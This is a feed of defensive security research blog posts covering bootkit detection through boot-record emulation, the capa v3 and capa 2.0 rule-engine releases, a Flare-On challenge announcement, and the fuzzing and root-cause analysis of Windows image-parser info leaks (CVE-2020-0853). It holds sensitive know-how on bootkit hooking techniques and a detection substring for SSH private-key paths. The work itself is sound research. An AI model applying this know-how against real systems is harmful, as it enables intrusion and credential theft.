Reading view

There are new articles available, click to refresh the page.

BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)	Avg # Unique Boot Records (md5)
100-1000	428
1000-10000	4,738
10000+	8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

A reliable collection of boot records from systems
A behavioral analysis of boot records, not just static analysis
The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).

Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”

Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.

Figure 3: Boot record analysis workflow

Our design currently utilizes:

API Gateway to provide a RESTful interface.
Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
DynamoDB to track progress of processed boot records through the system.
S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the engine X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

ELFant in the Room – capa v3

Threat Research

Willi Ballenthin

15 September 2021 at 13:00

Since our initial public release of capa, incident responders and reverse engineers have used the tool to automatically identify capabilities in Windows executables. With our newest code and ruleset updates, capa v3 also identifies capabilities in Executable and Linkable Format (ELF) files, such as those used on Linux and other Unix-like operating systems. This blog post describes the extended analysis and other improvements. You can download capa v3 standalone binaries from the project’s release page and checkout the source code on GitHub.

ELF File Format Support

capa finds capabilities in programs by parsing executable file formats, disassembling code, and then recognizing features in functions. In versions v1 and v2, capa only understood the PE file format, so its analysis was restricted to Windows programs. Thanks to our colleagues at Intezer, capa now recognizes ELF files! This means you can use the tool to identify behaviors in malware that targets Linux computers. Figure 1 shows a rule that describes techniques to fetch the current user on Linux.

Figure 1: capa rule identifying capabilities on Linux

We’re excited Intezer leverages capa and thrilled they are sharing their improvements with the community. In addition to the code updates, Intezer proposed 36 capa rules to identify various capabilities in ELF files, such as reconnaissance, persistence, and host interaction techniques. Please read Intezer’s blog post for more details.

New Features capa Can Recognize

As we taught capa to recognize ELF files, we also wanted rule authors to tune their rules to find behaviors specific to different operating systems (OS), CPU architectures, and file formats. For example, the APIs exposed by Windows are very different from those found on Linux systems; therefore, rules should clearly designate which pattern to use on Windows versus Linux.

Based on discussions and feedback collected from users and contributors, we've extended capa’s rule format to describe OSes, CPU architectures, and file formats. The rule shown in Figure 2 uses os features to distinguish techniques used to get networking interface information on Windows and Linux. Note that the rule is explicit about which APIs are found on each OS, making it easy for both humans and machines to interpret the matching logic.

Figure 2: capa rule using the os feature to distinguish OS specific features

We’ve also added arch (such as arch: i386 for 32-bit Intel code) and format (such as format: elf for ELF files) features to distinguish between CPU architectures and file formats. To learn more about these and capa’s rule syntax see the rule format documentation on GitHub.

Unfortunately, rules with these new features are not backwards compatible with older versions of capa. Therefore, you should prefer to upgrade your capa installation to take advantage of our enhanced rules.

Substring Features

To make many rules easier to read, we’ve added a convenience feature named substring that acts like a literal string match with implied leading and trailing wildcards. This makes it easier to match file path components, such as /.ssh/id_rsa. Previously, users had to wrap a substring with forward slashes and escape special characters with backslashes, leading to nearly incomprehensible character sequences. Now, a substring feature clearly describes a literal string found as part of a longer string. Figure 3 shows how much easier it is to read a substring feature.

Figure 3: Old- and new-style ways of describing a substring

Figure 4 shows a capa rule using a substring feature to describe a persistence location on Linux.

Figure 4: capa rule using the substring feature to identify persistence on Linux systems

Conclusion

The newest improvements add ELF file analysis support to capa and make its rules even more expressive. We thank the community and notably Intezer for their continued support. We love the collaboration and are excited for future opportunities. The v3 capa release also includes bug fixes, improvements to the IDAPython plugin capa explorer, and more than 50 new rules. See the capa changelog for all update details.

The new capa release is available on the release page and on PyPI. capa’s code and rules are available on GitHub. If you have any questions or feedback, please open an issue or discussion in the respective repository.

Announcing the Eighth Annual Flare-On Challenge

Threat Research

Nick Harbour

12 August 2021 at 15:30

The FLARE team is once again hosting its annual Flare-On challenge, now in its eighth year. Take this opportunity to enjoy some extreme social distancing by solving fun puzzles to test your mettle and learn new tricks on your path to reverse engineering excellence. The contest will begin at 8:00 p.m. ET on Sept. 10, 2021. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 22, 2021.

This year’s contest will consist of 10 challenges and feature a variety of formats, including Windows, Linux, and JavaScript. This is one of the only Windows-centric CTF contests out there and we have crafted it to represent the skills and challenges our FLARE team faces.

If you smash your way through all 10 challenges, you will receive a prize and permanent recognition on the Flare-On website to honor your greatness. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. Prior year’s prizes were belt buckles, a replica police badge, a challenge coin, a medal, a massive pin, and a cyber-styled skeleton key.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon8.

capa 2.0: Better, Faster, Stronger

Threat Research

William Ballenthin

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.

Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.

Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.

Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.

Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.

Figure 5: capa v1.6 results without library code recognition

Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.

Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
- C and C++ run-time libraries
- Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
The following open-source projects as compiled with VS2015, VS2017, and VS2019:
- CryptoPP
- curl
- Microsoft Detours
- Mbed TLS (previously PolarSSL)
- OpenSSL
- zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

Host Interaction describes program functionality to interact with the file system, processes, and the registry
Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
Collection describes functionality used to steal data such as credentials or credit card information
Data Manipulation describes capabilities to encrypt, decrypt, and hash data
Communication describes data transfer techniques such as HTTP, DNS, and TCP

Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Fuzzing Image Parsing in Windows, Part Two: Uninitialized Memory

Threat Research

Dhanesh Kizhakkinan

3 March 2021 at 19:30

Continuing our discussion of image parsing vulnerabilities in Windows, we take a look at a comparatively less popular vulnerability class: uninitialized memory. In this post, we will look at Windows’ inbuilt image parsers—specifically for vulnerabilities involving the use of uninitialized memory.

The Vulnerability: Uninitialized Memory

In unmanaged languages, such as C or C++, variables are not initialized by default. Using uninitialized variables causes undefined behavior and may cause a crash. There are roughly two variants of uninitialized memory:

Direct uninitialized memory usage: An uninitialized pointer or an index is used in read or write. This may cause a crash.
Information leakage (info leak) through usage of uninitialized memory: Uninitialized memory content is accessible across a security boundary. An example: an uninitialized kernel buffer accessible from user mode, leading to information disclosure.

In this post we will be looking closely at the second variant in Windows image parsers, which will lead to information disclosure in situations such as web browsers where an attacker can read the decoded image back using JavaScript.

Detecting Uninitialized Memory Vulnerabilities

Compared to memory corruption vulnerabilities such as heap overflow and use-after-free, uninitialized memory vulnerabilities on their own do not access memory out of bound or out of scope. This makes detection of these vulnerabilities slightly more complicated than memory corruption vulnerabilities. While direct uninitialized memory usage can cause a crash and can be detected, information leakage doesn’t usually cause any crashes. Detecting it requires compiler instrumentations such as MemorySanitizer or binary instrumentation/recompilation tools such as Valgrind.

Detour: Detecting Uninitialized Memory in Linux

Let's take a little detour and look at detecting uninitialized memory in Linux and compare with Windows’ built-in capabilities. Even though compilers warn about some uninitialized variables, most of the complicated cases of uninitialized memory usage are not detected at compile time. For this, we can use a run-time detection mechanism. MemorySanitizer is a compiler instrumentation for both GCC and Clang, which detects uninitialized memory reads. A sample of how it works is given in Figure 1.

$ cat sample.cc
#include <stdio.h>

int main()
{
int *arr = new int[10];
if(arr[3] == 0)
{
printf("Yay!\n");
}
printf("%08x\n", arr[3]);
return 0;
}

$ clang++ -fsanitize=memory -fno-omit-frame-pointer -g sample.cc

$ ./a.out
==29745==WARNING: MemorySanitizer: use-of-uninitialized-value
#0 0x496db8 (/home/dan/uni/a.out+0x496db8)
#1 0x7f463c5f1bf6 (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#2 0x41ad69 (/home/dan/uni/a.out+0x41ad69)

SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/dan/uni/a.out+0x496db8)
Exiting

Figure 1: MemorySanitizer detection of uninitialized memory

Similarly, Valgrind can also be used to detect uninitialized memory during run-time.

Detecting Uninitialized Memory in Windows

Compared to Linux, Windows lacks any built-in mechanism for detecting uninitialized memory usage. While Visual Studio and Clang-cl recently introduced AddressSanitizer support, MemorySanitizer and other sanitizers are not implemented as of this writing.

Some of the useful tools in Windows to detect memory corruption vulnerabilities such as PageHeap do not help in detecting uninitialized memory. On the contrary, PageHeap fills the memory allocations with patterns, which essentially makes them initialized.

There are few third-party tools, including Dr.Memory, that use binary instrumentation to detect memory safety issues such as heap overflows, uninitialized memory usages, use-after-frees, and others.

Detecting Uninitialized Memory in Image Decoding

Detecting uninitialized memory in Windows usually requires binary instrumentation, especially when we do not have access to source code. One of the indicators we can use to detect uninitialized memory usage, specifically in the case of image decoding, is the resulting pixels after the image is decoded.

When an image is decoded, it results in a set of raw pixels. If image decoding uses any uninitialized memory, some or all of the pixels may end up as random. In simpler words, decoding an image multiple times may result in different output each time if uninitialized memory is used. This difference of output can be used to detect uninitialized memory and aid writing a fuzzing harness targeting Windows image decoders. An example fuzzing harness is presented in Figure 2.

#define ROUNDS 20

unsigned char* DecodeImage(char *imagePath)
{
unsigned char *pixels = NULL;

// use GDI or WIC to decode image and get the resulting pixels
...
...

return pixels;
}

void Fuzz(char *imagePath)
{
unsigned char *refPixels = DecodeImage(imagePath);

if(refPixels != NULL)
{
for(int i = 0; i < ROUNDS; i++)
{
unsigned char *currPixels = DecodeImage(imagePath);
if(!ComparePixels(refPixels, currPixels))
{
// the reference pixels and current pixels don't match
// crash now to let the fuzzer know of this file
CrashProgram();
}
free(currPixels);
}
free(refPixels);
}
}

Figure 2: Diff harness

The idea behind this fuzzing harness is not entirely new; previously, lcamtuf used a similar idea to detect uninitialized memory in open-source image parsers and used a web page to display the pixel differences.

Fuzzing

With the diffing harness ready, one can proceed to look for the supported image formats and gather corpuses. Gathering image files for corpus is considerably easy given the near unlimited availability on the internet, but at the same time it is harder to find good corpuses among millions of files with unique code coverage. Code coverage information for Windows image parsing is tracked from WindowsCodecs.dll.

Note that unlike regular Windows fuzzing, we will not be enabling PageHeap this time as PageHeap “initializes” the heap allocations with patterns.

Results

During my research, I found three cases of uninitialized memory usage while fuzzing Windows built-in image parsers. Two of them are explained in detail in the next sections. Root cause analysis of uninitialized memory usage is non-trivial. We don’t have a crash location to back trace, and have to use the resulting pixel buffer to back trace to find the root cause—or use clever tricks to find the deviation.

CVE-2020-0853

Let’s look at the rendering of the proof of concept (PoC) file before going into the root cause of this vulnerability. For this we will use lcamtuf’s HTML, which loads the PoC image multiple times and compares the pixels with reference pixels.

Figure 3: CVE-2020-0853

As we can see from the resulting images (Figure 3), the output varies drastically in each decoding and we can assume this PoC leaks a lot of uninitialized memory.

To identify the root cause of these vulnerabilities, I used Time Travel Debugging (TTD) extensively. Tracing back the execution and keeping track of the memory address is a tedious task, but TTD makes it only slightly less painful by keeping the addresses and values constant and providing unlimited forward and backward executions.

After spending quite a bit of time debugging the trace, I found the source of uninitialized memory in windowscodecs!CFormatConverter::Initialize. Even though the source was found, it was not initially clear why this memory ends up in the calculation of pixels without getting overwritten at all. To solve this mystery, additional debugging was done by comparing PoC execution trace against a normal TIFF file decoding. The following section shows the allocation, copying of uninitialized value to pixel calculation and the actual root cause of the vulnerability.

Allocation and Use of Uninitialized Memory

windowscodecs!CFormatConverter::Initialize allocates 0x40 bytes of memory, as shown in Figure 4.

0:000> r
rax=0000000000000000 rbx=0000000000000040 rcx=0000000000000040
rdx=0000000000000008 rsi=000002257a3db448 rdi=0000000000000000
rip=00007ffaf047a238 rsp=000000ad23f6f7c0 rbp=000000ad23f6f841
r8=000000ad23f6f890 r9=0000000000000010 r10=000002257a3db468
r11=000000ad23f6f940 r12=000000000000000e r13=000002257a3db040
r14=000002257a3dbf60 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b             efl=00000246
windowscodecs!CFormatConverter::Initialize+0x1c8:
00007ffa`f047a238 ff15ea081200    call    qword ptr [windowscodecs!_imp_malloc (00007ffa`f059ab28)] ds:00007ffa`f059ab28={msvcrt!malloc (00007ffa`f70e9d30)}
0:000> k
# Child-SP          RetAddr               Call Site
00 000000ad`23f6f7c0 00007ffa`f047c5fb     windowscodecs!CFormatConverter::Initialize+0x1c8
01 000000ad`23f6f890 00007ffa`f047c2f3     windowscodecs!CFormatConverter::Initialize+0x12b
02 000000ad`23f6f980 00007ff6`34ca6dff     windowscodecs!CFormatConverterResolver::Initialize+0x273

//Uninitialized memory after allocation:
0:000> db @rax
00000225`7a3dbf70 d0 b0 3d 7a 25 02 00 00-60 24 3d 7a 25 02 00 00 ..=z%...`$=z%...
00000225`7a3dbf80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbf90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbfa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbfb0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbfc0 00 00 00 00 00 00 00 00-64 51 7c 26 c3 2c 01 03 ........dQ|&.,..
00000225`7a3dbfd0 f0 00 2f 6b 25 02 00 00-f0 00 2f 6b 25 02 00 00 ../k%...../k%...
00000225`7a3dbfe0 60 00 3d 7a 25 02 00 00-60 00 3d 7a 25 02 00 00 `.=z%...`.=z%...

Figure 4: Allocation of memory

The memory never gets written and the uninitialized values are inverted in windowscodecs!CLibTiffDecoderBase::HrProcessCopy and further processed in windowscodecs!GammaConvert_16bppGrayInt_128bppRGBA and in later called scaling functions.

As there is no read or write into uninitialized memory before HrProcessCopy, I traced the execution back from HrProcessCopy and compared the execution traces with a normal tiff decoding trace. A difference was found in the way windowscodecs!CLibTiffDecoderBase::UnpackLine behaved with the PoC file compared to a normal TIFF file, and one of the function parameters in UnpackLine was a pointer to the uninitialized buffer.

The UnpackLine function has a series of switch-case statements working with bits per sample (BPS) of TIFF images. In our PoC TIFF file, the BPS value is 0x09—which is not supported by UnpackLine—and the control flow never reaches a code path that writes to the buffer. This is the root cause of the uninitialized memory, which gets processed further down the pipeline and finally shown as pixel data.

Patch

After presenting my analysis to Microsoft, they decided to patch the vulnerability by making the files with unsupported BPS values as invalid. This avoids all decoding and rejects the file in the very early phase of its loading.

CVE-2020-1397

Figure 5: Rendering of CVE-2020-1397

Unlike the previous vulnerability, the difference in the output is quite limited in this one, as seen in Figure 5. One of the simpler root cause analysis techniques that can be used to figure out a specific type of uninitialized memory usage is comparing execution traces of runs that produce two different outputs. This specific technique can be helpful when an uninitialized variable causes a control flow change in the program and that causes a difference in the outputs. For this, a binary instrumentation script was written, which logged all the instructions executed along with its registers and accessed memory values.

